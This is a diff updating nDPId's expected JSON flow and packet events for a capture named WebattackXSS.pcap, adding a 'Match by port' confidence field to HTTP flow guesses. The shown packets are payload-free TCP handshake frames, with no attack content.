+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347074268,"flow_last_seen":1499347079633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53340,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347074268,"flow_last_seen":1499347079633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192312,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347192547,"flow_last_seen":1499347192547,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347192547,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1499347192547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347192547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NKNAAD4GkS2sEAABwKgKMtU0AFBlD\/cgAAAAAKACchBokgAAAgQFtAQCCAoBOcODAAAAAAEDAwc="}
@@ -676,17 +676,17 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1951,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1499347201471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347201471,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JERAAD4GoYysEAABwKgKMtWSAFCOe+h\/AAAAAKACchBEsQAAAgQFtAQCCAoBOcw7AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1952,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":1499347201471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347201471,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1ZJxUzmIjnvogKAScSD5HwAAAgQFtAQCCAoD452xATnMOwEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1953,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":3,"flow_last_seen":1499347201472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347201472,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JEVAAD4GoZOsEAABwKgKMtWSAFCOe+iAcVM5iYAQAOWYJwAAAQEICgE5zDsD452x"}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347075596,"flow_last_seen":1499347080634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53354,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347075596,"flow_last_seen":1499347080634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347075596,"flow_last_seen":1499347080634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347078168,"flow_last_seen":1499347083634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53380,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347078168,"flow_last_seen":1499347083634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347078168,"flow_last_seen":1499347083634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347079449,"flow_last_seen":1499347084635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53394,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347079449,"flow_last_seen":1499347084635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53394,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347079449,"flow_last_seen":1499347084635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347080793,"flow_last_seen":1499347086636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53408,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347080793,"flow_last_seen":1499347086636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53408,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347080793,"flow_last_seen":1499347086636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347082084,"flow_last_seen":1499347087636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53422,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347082084,"flow_last_seen":1499347087636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347082084,"flow_last_seen":1499347087636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347083358,"flow_last_seen":1499347088637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53436,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347083358,"flow_last_seen":1499347088637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53436,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347083358,"flow_last_seen":1499347088637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1967,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347202722,"flow_last_seen":1499347202722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347202722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1967,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1499347202722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347202722,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83mxAAD4G52OsEAABwKgKMtWgAFD5fxMfAAAAAKACchCtxwAAAgQFtAQCCAoBOc1zAAAAAAEDAwc="}
@@ -712,17 +712,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2037,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1499347211522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347211522,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86VZAAD4G3HmsEAABwKgKMtX+AFCmKj9dAAAAAKACchDL6AAAAgQFtAQCCAoBOdYLAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2038,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1499347211522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347211522,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1f624YVgpio\/XqAScSDlHwAAAgQFtAQCCAoD46eCATnWCwEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2039,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1499347211523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347211523,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06VdAAD4G3ICsEAABwKgKMtX+AFCmKj9etuGFYYAQAOWEJgAAAQEICgE51gwD46eC"}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347084644,"flow_last_seen":1499347090638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53450,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347084644,"flow_last_seen":1499347090638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53450,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347084644,"flow_last_seen":1499347090638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347087256,"flow_last_seen":1499347092638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347087256,"flow_last_seen":1499347092638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347087256,"flow_last_seen":1499347092638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347088552,"flow_last_seen":1499347093638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53490,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347088552,"flow_last_seen":1499347093638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347088552,"flow_last_seen":1499347093638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347091102,"flow_last_seen":1499347096639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53516,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347091102,"flow_last_seen":1499347096639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347091102,"flow_last_seen":1499347096639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347092374,"flow_last_seen":1499347097640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53530,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347092374,"flow_last_seen":1499347097640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347092374,"flow_last_seen":1499347097640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
